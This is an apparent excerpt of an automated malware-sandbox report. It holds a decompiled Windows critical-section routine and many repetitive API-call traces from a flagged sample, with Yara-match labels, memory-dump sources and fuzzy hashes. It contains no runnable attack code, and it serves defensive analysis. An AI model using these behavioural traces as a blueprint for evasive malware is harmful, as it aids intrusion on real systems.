				_t15 = _t12;                           /* critical section pointer (input register not recovered by the decompiler) */
				/* 0xffffffffff676980 == -10,000,000, i.e. one second in 100-ns units: the helper most likely converts the timeout to seconds */
				_t7 = E0121CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01265720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;                          /* RTL_CRITICAL_SECTION.DebugInfo */
				if(_t9 == 0xffffffff) {
					_t10 = 0;                          /* no debug record attached: report ContentionCount as 0 */
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14)); /* RTL_CRITICAL_SECTION_DEBUG.ContentionCount */
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));    /* RTL_CRITICAL_SECTION.OwningThread */
				_push( *((intOrPtr*)(_t14 + 0x24)));   /* TEB.ClientId.UniqueThread */
				/* remaining format argument is TEB.ClientId.UniqueProcess */
				return E01265720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

                                                                      APIs
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0126FDFA
                                                                      Strings
                                                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0126FE01
                                                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0126FE2B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                      • API String ID: 885266447-3903918235
                                                                      • Opcode ID: 2aa95e687a9de298dbe3b8478680446cd18e53ef57ff43445215ea5b5b850161
                                                                      • Instruction ID: 2ff57c96cd1c248c7f6ed9ffc4321a05d3be30cd95c1d1191df8e9cd9ba4eb2b
                                                                      • Opcode Fuzzy Hash: 2aa95e687a9de298dbe3b8478680446cd18e53ef57ff43445215ea5b5b850161
                                                                      • Instruction Fuzzy Hash: 8AF0F632250602BFEB291A45DC42F33BF5EEB54B70F140318F628565D1DA62F87086F4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00123B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00123B87,007A002E,00000000,00000060,00000000,00000000), ref: 001281FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction ID: 6499158b45e0035caf9f587ed7b919b69fe0ba9e51b031533cc1b611a46256f9
                                                                      • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                      • Instruction Fuzzy Hash: 50F0B6B2201108ABCB08CF88DC85DEB77ADAF8C754F158248BA0D97241D630E8118BA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtCreateFile.NTDLL(00000060,00000000,.z`,00123B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00123B87,007A002E,00000000,00000060,00000000,00000000), ref: 001281FD
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: .z`
                                                                      • API String ID: 823142352-1441809116
                                                                      • Opcode ID: 0d27d29b9e2a4bb204cd24bc9c6b15062f0e075be3e4821281b51092670e45de
                                                                      • Instruction ID: f89d01dec6dcf4c81a8b2ef9a2211408c00f974d55adf52232d6b08ccff0b057
                                                                      • Opcode Fuzzy Hash: 0d27d29b9e2a4bb204cd24bc9c6b15062f0e075be3e4821281b51092670e45de
                                                                      • Instruction Fuzzy Hash: 4BF01FB2204149ABCB48DF98DC84CEB77A9BF8C310B14828CFA1D97206D630E851CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(00123D42,5E972F59,FFFFFFFF,00123A01,?,?,00123D42,?,00123A01,FFFFFFFF,5E972F59,00123D42,?,00000000), ref: 001282A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction ID: badd62764bfd0d932eeb41eb106ff8353f283c18e0bb586a8e4ca6d849705513
                                                                      • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                      • Instruction Fuzzy Hash: AFF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158248BA1D97241DA30E8118BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtReadFile.NTDLL(00123D42,5E972F59,FFFFFFFF,00123A01,?,?,00123D42,?,00123A01,FFFFFFFF,5E972F59,00123D42,?,00000000), ref: 001282A5
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Similarity
                                                                      • API ID: FileRead
                                                                      • String ID:
                                                                      • API String ID: 2738559852-0
                                                                      • Opcode ID: 923cc57cad8c61623553e420b7921e20bf403dc7a66e21d496952f2080b6b28f
                                                                      • Instruction ID: d5d9f1b69ae81299c2a2e7eb43cf28b9bd282ead57f8bcdb016a21dbcf18f56b
                                                                      • Opcode Fuzzy Hash: 923cc57cad8c61623553e420b7921e20bf403dc7a66e21d496952f2080b6b28f
                                                                      • Instruction Fuzzy Hash: AAF0FFB2200149AFCB14DF98D890CEB77A9FF8C314B15865DFD4D97215CA30E855CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • NtClose.NTDLL(00123D20,?,?,00123D20,00000000,FFFFFFFF), ref: 00128305
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Similarity
                                                                      • API ID: Close
                                                                      • String ID:
                                                                      • API String ID: 3535843008-0
                                                                      • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction ID: f863bed55615a9cce8faa7257b825d4ae0e8b068d5127fad4b3a2e165901eb70
                                                                      • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                      • Instruction Fuzzy Hash: 9CD012752002146BD710EFD8DC45ED7775CEF44750F154455BA185B242D930F91086E0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 83b14f082791d7025347284595b04020980a2a0e1bc3e974ca578e8f52d48cfe
                                                                      • Instruction ID: 3f1233fe2000ba26cb424deec37a90deb4938e430e2c11898de284446a979fb1
                                                                      • Opcode Fuzzy Hash: 83b14f082791d7025347284595b04020980a2a0e1bc3e974ca578e8f52d48cfe
                                                                      • Instruction Fuzzy Hash: D890026221191142D20065694C14B07000597D0353F61D159A4184554CC95588766561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 86796b73a4b2052f5f48309d7b59c8fea9d62b9c342ba9c72b91fab454a32c0c
                                                                      • Instruction ID: 75f72ec40ac898b862aacdc6158cbaed5fc8ad80057a781593b36cadf3026d27
                                                                      • Opcode Fuzzy Hash: 86796b73a4b2052f5f48309d7b59c8fea9d62b9c342ba9c72b91fab454a32c0c
                                                                      • Instruction Fuzzy Hash: 5990027220111513D11161594504707000997D0291FA1D456A4454558D96968967B161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ca6c95b0dcd92bb510e43937bd53aef79d96a7a2255360f2b454211f05a5f819
                                                                      • Instruction ID: a3f061c8f1e0f76244809d25694c7ae5a9bc68a8c5b10d8056fcfd8b6dbba43f
                                                                      • Opcode Fuzzy Hash: ca6c95b0dcd92bb510e43937bd53aef79d96a7a2255360f2b454211f05a5f819
                                                                      • Instruction Fuzzy Hash: DB900262242152525545B15944045074006A7E02917A1D056A5444950C8566986BE661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e042d25470e62c4021620fe860434d3dd5c7e6f6600c4042ba29c00aade81be5
                                                                      • Instruction ID: a9d787b0b1d2b3d72bc7a52b623e51b0747deac89a2a443fc291d2a3212579f6
                                                                      • Opcode Fuzzy Hash: e042d25470e62c4021620fe860434d3dd5c7e6f6600c4042ba29c00aade81be5
                                                                      • Instruction Fuzzy Hash: FF9002A234111542D10061594414B070005D7E1351F61D059E5094554D8659CC677166
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ed9e57d83f66c19f9a7dec8572d7db8beb45b99db65c33b9aadcaaba3d608d87
                                                                      • Instruction ID: bf31c453c5b765c2858493f6d65881eaa5657eaf2d88b3f337f44fb0f9a2b2a4
                                                                      • Opcode Fuzzy Hash: ed9e57d83f66c19f9a7dec8572d7db8beb45b99db65c33b9aadcaaba3d608d87
                                                                      • Instruction Fuzzy Hash: 379002B220111502D14071594404747000597D0351F61D055A9094554E86998DEA76A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e951113ed2c0612507ff9768b30fa960cb0cc711c01c13464e89aed5d75f7465
                                                                      • Instruction ID: 070759c2f75a25bd9f83fd2d4b9a6a91ba040fcf44b34998b7e1fa207966959c
                                                                      • Opcode Fuzzy Hash: e951113ed2c0612507ff9768b30fa960cb0cc711c01c13464e89aed5d75f7465
                                                                      • Instruction Fuzzy Hash: 5690027220119902D1106159840474B000597D0351F65D455A8454658D86D588A67161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 645ac536f94de3f9d570551c2706a5a5160c566b6c98f4de729ba30bc1b3760f
                                                                      • Instruction ID: ba85c3a4c37e97a008411f6bf2fef71483aaee6816fcf41c93ad16331b9ec661
                                                                      • Opcode Fuzzy Hash: 645ac536f94de3f9d570551c2706a5a5160c566b6c98f4de729ba30bc1b3760f
                                                                      • Instruction Fuzzy Hash: 8F90027220111942D10061594404B47000597E0351F61D05AA4154654D8655C8667561
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6ad42e8f947c26eae374903720a74ff57a728c53820eb0835b20e8280280d6b9
                                                                      • Instruction ID: 1aea100b601d5df18febfa62dbdf8fcaa8365e060cb0d3d92b4ec23f7b7f7da0
                                                                      • Opcode Fuzzy Hash: 6ad42e8f947c26eae374903720a74ff57a728c53820eb0835b20e8280280d6b9
                                                                      • Instruction Fuzzy Hash: B590026A21311102D1807159540860B000597D1252FA1E459A4045558CC955887E6361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3457950d30a5c8bd59eea9f37e522605a55869dd50c98339b88c1e7e98923245
                                                                      • Instruction ID: 57572391851b2f27633fb0cd49dbd520aa26872dbe37d71c755d3b42cf3a3286
                                                                      • Opcode Fuzzy Hash: 3457950d30a5c8bd59eea9f37e522605a55869dd50c98339b88c1e7e98923245
                                                                      • Instruction Fuzzy Hash: 6C90027231125502D11061598404707000597D1251F61D455A4854558D86D588A67162
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: f1d5957ef4953623169c28a8a03d9923d9dbba1f302deefcc48dcbec9d0dc0f1
                                                                      • Instruction ID: d18746bf54b0209895b13222e3137308ca1e50893f624ed6235fd02680cc6957
                                                                      • Opcode Fuzzy Hash: f1d5957ef4953623169c28a8a03d9923d9dbba1f302deefcc48dcbec9d0dc0f1
                                                                      • Instruction Fuzzy Hash: 5890027220111502D10065995408647000597E0351F61E055A9054555EC6A588A67171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: bec2c6bcd0a6aba13e415eab568a61847c722c186af71e4d1478de002b08418c
                                                                      • Instruction ID: 1777d51b05d7833f509a142a0a2a3a6bd1c2668c3210c8c143c247e22e8df922
                                                                      • Opcode Fuzzy Hash: bec2c6bcd0a6aba13e415eab568a61847c722c186af71e4d1478de002b08418c
                                                                      • Instruction Fuzzy Hash: A49002A220211103410571594414617400A97E0251B61D065E5044590DC56588A67165
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 882aa7852ada9ecc8d8a71882bf208801fecbbc80ba6f878e1203d3d5c60af9a
                                                                      • Instruction ID: 82f17f70930510cccff9b8bcc0d270def00503356d0ba86844ed1572b13c5f8d
                                                                      • Opcode Fuzzy Hash: 882aa7852ada9ecc8d8a71882bf208801fecbbc80ba6f878e1203d3d5c60af9a
                                                                      • Instruction Fuzzy Hash: 47900477311111030105F55D07045070047D7D53F1371D075F5045550CD771CC777171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 00126F78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 2bd0cf6b713eb471d7167dbc98f1b1573f721bb1252b511e462bcee841536980
                                                                      • Instruction ID: 67880e136812acb038e59fb035610420e6b2273de8189b9f66bf7633162d7ccc
                                                                      • Opcode Fuzzy Hash: 2bd0cf6b713eb471d7167dbc98f1b1573f721bb1252b511e462bcee841536980
                                                                      • Instruction Fuzzy Hash: DD319EB1601704ABC715DFA8E9A1FA7B7B8AF98700F00841DF61A9B281D730B955CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 00126F78
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: a14fa264310eab212456f14e61e4fe6d2f9a928326dce70ad7c6d8917e647bad
                                                                      • Instruction ID: c5e4115aba9516f17d1d2366116185f5d96d4f14853e6a4fcd1ca115c9213b82
                                                                      • Opcode Fuzzy Hash: a14fa264310eab212456f14e61e4fe6d2f9a928326dce70ad7c6d8917e647bad
                                                                      • Instruction Fuzzy Hash: C221D2B1601304ABCB14DFA8E9A1F67B7B4FF48700F10801DF6199B281D774A865CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00113B93), ref: 001284ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 289143d542d1eabfaa67d2cf307606a16e492e7d096e71be333bec05a26e5450
                                                                      • Instruction ID: f0874cba9defb1b62115b2518b195779c2ab58925170da8dc12aa55bd3f47bd5
                                                                      • Opcode Fuzzy Hash: 289143d542d1eabfaa67d2cf307606a16e492e7d096e71be333bec05a26e5450
                                                                      • Instruction Fuzzy Hash: 27F0EDB0200258ABCB14DFA8CC49EEB3B68EF88314F25448DF9484B242CA30EC14CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00113B93), ref: 001284ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: 1c20629309dbcdaf8c22ddb6e02fcf8f10e20dd329a6d1be239c54dd7a6b93df
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: AEE01AB12002186BDB14DF99DC45EA777ACAF88750F014554BA0857241DA30E9148AF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001172BA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001172DB
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 0d48ae8107cc51bb9b2dcdcdaff36038a9ecf63072080ee29a96342c7ecb6ba6
                                                                      • Instruction ID: ca32957d3814886ddb4bb717d5d28e4f9ed62546bdbd24cce8c68c15a5063b90
                                                                      • Opcode Fuzzy Hash: 0d48ae8107cc51bb9b2dcdcdaff36038a9ecf63072080ee29a96342c7ecb6ba6
                                                                      • Instruction Fuzzy Hash: 1101DB31A8022877EB24A6949C03FFE776C5F10B50F550125FF04BA1C2E7A4690647F5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00119B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction ID: 120454e7de6e0da31ffde655f183dd6ff67ddd4cd7286fffe2693b660c9e3cfe
                                                                      • Opcode Fuzzy Hash: 4621568ce873deb1313e0de628d8eea835b94914331d8dec1d02c8297636d00b
                                                                      • Instruction Fuzzy Hash: BE010CB5D4420DABDF14DAA4EC92FDDB7789B64308F0041A5A91897241F631EB54CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0011CCC0,?,?), ref: 0012703C
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                      • Instruction ID: 67fa5fbb6d766c122edaeb7931622a076a6eeedf735865c7a7683c50b7bb148f
                                                                      • Opcode Fuzzy Hash: 095b0b520be20d85b9640018a1fec647bbd965483516bedb257205f626dfced0
                                                                      • Instruction Fuzzy Hash: 66E092333803143AE3306599BC03FA7B39CCB91B20F150026FA0DEB2C1D695F91142A8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011CF92,0011CF92,?,00000000,?,?), ref: 00128650
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
                                                                      • Instruction ID: 95ea95cd4e00694aa4392ba1e0405e6b483616a867627426e6c69b2eb55f70c8
                                                                      • Opcode Fuzzy Hash: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
                                                                      • Instruction Fuzzy Hash: E6F030B62112146FD720EF99EC45DE7779EEF84360B018555F90C57242C631E92086B0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,0011CF92,0011CF92,?,00000000,?,?), ref: 00128650
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction ID: 80f9644a2a552c4d8f4a540438d55e44300297a26b619ffb269765336efc07e5
                                                                      • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                      • Instruction Fuzzy Hash: 4EE01AB12002186BDB10DF89DC85EE737ADAF88650F018154BA0857241DA30E8148BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,00117C63,?), ref: 0011D42B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, Offset: 00110000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction ID: 9d93ba17a822e896013c4cb416392a6c86f0bdf5c82efed4df6f9f61d302ab7a
                                                                      • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                      • Instruction Fuzzy Hash: 04D0A7717903043BE610FAA8AC03F6632CD9B54B00F494074F948D73C3DA64F5004161
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.595869382.0000000002AB0000.00000040.00000001.sdmp, Offset: 02AB0000, based on PE: true
                                                                      • Associated: 00000017.00000002.596984017.0000000002BCB000.00000040.00000001.sdmp
                                                                      • Associated: 00000017.00000002.597020063.0000000002BCF000.00000040.00000001.sdmp
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 9bf9d988ef331c32cfe43a6043211565ffbba1b8c14a5f08a1cda502973c434f
                                                                      • Instruction ID: b1bcb7486a2cd87c15227ccd829d805069f5ff41ac7778ecfe192769cc4953d0
